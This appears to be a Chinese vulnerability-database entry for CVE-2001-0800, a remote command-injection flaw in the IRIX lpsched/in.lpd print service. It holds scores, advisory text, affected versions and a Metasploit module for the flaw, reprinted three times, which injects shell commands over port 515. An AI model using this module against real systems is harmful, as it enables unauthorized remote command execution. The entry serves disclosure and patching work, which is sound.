CVE-2001-0800
CVSS10.0
发布时间 :2001-12-06 00:00:00
修订时间 :2008-09-05 16:24:57
NMCOEPS    

[原文]lpsched in IRIX 6.5.13f and earlier allows remote attackers to execute arbitrary commands via shell metacharacters.


[CNNVD]IRIX lpsched命令执行漏洞(CNNVD-200112-058)

        IRIX 6.5.13f及其更早版本的lpsched存在漏洞。本地用户可以通过shell元字符执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0800
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0800
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-058
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20011003-02-P
(VENDOR_ADVISORY)  SGI  20011003-02-P
http://www.lsd-pl.net/files/get?IRIX/irx_lpsched2
(UNKNOWN)  MISC  http://www.lsd-pl.net/files/get?IRIX/irx_lpsched2
http://www.securityfocus.com/bid/27566
(UNKNOWN)  BID  27566

- 漏洞信息

IRIX lpsched命令执行漏洞
危急 未知
2001-12-06 00:00:00 2005-10-20 00:00:00
远程  
        IRIX 6.5.13f及其更早版本的lpsched存在漏洞。本地用户可以通过shell元字符执行任意命令。

- 公告与补丁

        

- 漏洞信息 (10033)

Irix LPD tagprinter Command Execution (EDBID:10033)
irix remote
2001-09-01 Verified
515 H D Moore
N/A [点击下载]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Irix LPD tagprinter Command Execution',
			'Description'    => %q{
				This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Irix.		
			},
			'Author'         => [ 'optyx', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2001-0800'],
					['OSVDB', '8573'],
					['URL',   'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'irix'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 512,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic telnet',
						}
				},		
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Sep 01 2001',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def check
		connect
		sock.put("T;uname -a;\n")
		resp = sock.get_once
		disconnect
		
		if (resp =~ /IRIX/)
			print_status("Response: #{resp.strip}")
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect
		sock.put("T;#{payload.encoded};\n")
		handler
		print_status("Payload: #{payload.encoded}")
	end

end
		

- 漏洞信息 (16877)

Irix LPD tagprinter Command Execution (EDBID:16877)
irix remote
2010-10-06 Verified
0 metasploit
N/A [点击下载]
##
# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Irix LPD tagprinter Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Irix.
			},
			'Author'         => [ 'optyx', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10561 $',
			'References'     =>
				[
					['CVE', '2001-0800'],
					['OSVDB', '8573'],
					['URL',   'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'irix'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 512,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Sep 01 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(515)
			], self.class)
	end

	def check
		connect
		sock.put("T;uname -a;\n")
		resp = sock.get_once
		disconnect

		if (resp =~ /IRIX/)
			print_status("Response: #{resp.strip}")
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		sock.put("T;#{payload.encoded};\n")
		handler
		print_status("Payload: #{payload.encoded}")
	end

end
		

- 漏洞信息 (F82229)

Irix LPD tagprinter Command Execution (PacketStormID:F82229)
2009-10-27 00:00:00
H D Moore  
exploit,arbitrary
irix
CVE-2001-0800
[点击下载]

This Metasploit module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Irix.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Irix LPD tagprinter Command Execution',
			'Description'    => %q{
				This module exploits an arbitrary command execution flaw in
				the in.lpd service shipped with all versions of Irix.		
			},
			'Author'         => [ 'optyx', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2001-0800'],
					['OSVDB', '8573'],
					['URL',   'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'irix'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'       => 512,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic telnet',
						}
				},		
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DisclosureDate' => 'Sep 01 2001',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(515)
				], self.class)
	end

	def check
		connect
		sock.put("T;uname -a;\n")
		resp = sock.get_once
		disconnect
		
		if (resp =~ /IRIX/)
			print_status("Response: #{resp.strip}")
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect
		sock.put("T;#{payload.encoded};\n")
		handler
		print_status("Payload: #{payload.encoded}")
	end

end

    

- 漏洞信息

8573
IRIX lpsched Shell Metacharacter Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Vendor Verified

- 漏洞描述

IRIX contains a flaw that may allow a remote attacker to execute arbitrary commands. The problem is that the 'lpsched' binary does not validate user-supplied input. By passing shell metacharacters to the binary, it is possible for a remote attacker to execute arbitrary commands resulting in a loss of integrity.

- 时间线

2001-09-01 Unknow
2001-09-01 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, SGI has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

IRIX 'lpsched' Remote Command Execution Vulnerability
Input Validation Error 27566
Yes No
2001-11-09 12:00:00 2008-02-04 02:56:00
Last Stage of Delirium is credited with discovering this issue.

- 受影响的程序版本

SGI IRIX 6.5.13 m
SGI IRIX 6.5.13 f
SGI IRIX 6.5.12 m
SGI IRIX 6.5.12 f
SGI IRIX 6.5.11 m
SGI IRIX 6.5.11 f
SGI IRIX 6.5.10 m
SGI IRIX 6.5.10 f
SGI IRIX 6.5.9 m
SGI IRIX 6.5.9 f
SGI IRIX 6.5.8 m
SGI IRIX 6.5.8 f
SGI IRIX 6.5.7 m
SGI IRIX 6.5.7 f
SGI IRIX 6.5.6 m
SGI IRIX 6.5.6 f
SGI IRIX 6.5.5 m
SGI IRIX 6.5.5 f
SGI IRIX 6.5.4 m
SGI IRIX 6.5.4 f
SGI IRIX 6.5.3 m
SGI IRIX 6.5.3 f
SGI IRIX 6.5.2 m
SGI IRIX 6.5.2 f
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f

- 不受影响的程序版本

SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f

- 漏洞讨论

The 'lpsched' utility in IRIX is prone to a remote shell command-execution vulnerability.

Successfully exploiting this issue can allow arbitrary commands to run in the context of the affected user.

- 漏洞利用

To exploit this issue, attackers can use readily available networking utilities.

The following exploit code is available as a module for the Metasploit Framework:

- 解决方案

Please see the references for more information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站